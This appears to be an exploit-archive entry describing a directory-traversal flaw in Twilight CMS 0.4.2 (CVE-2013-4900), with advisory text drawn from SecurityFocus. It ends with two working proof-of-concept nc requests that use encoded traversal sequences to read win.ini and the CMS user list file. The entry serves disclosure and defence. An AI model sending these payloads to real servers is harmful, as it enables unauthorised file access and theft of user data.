[] NeoSense
E X P L O I T S
title author type platform port cve id

Twilight CMS - DeWeS Web Server Directory Traversal

Author: High-Tech Bridge
type: webapps
platform: php
port: 
date_added: 2013-08-21 
date_updated: 2015-11-17 
verified: 1 
codes: CVE-2013-4900;OSVDB-96479 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/61906/info

Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

Twilight CMS 0.4.2 is vulnerable; other versions may also be affected.

nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1

nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.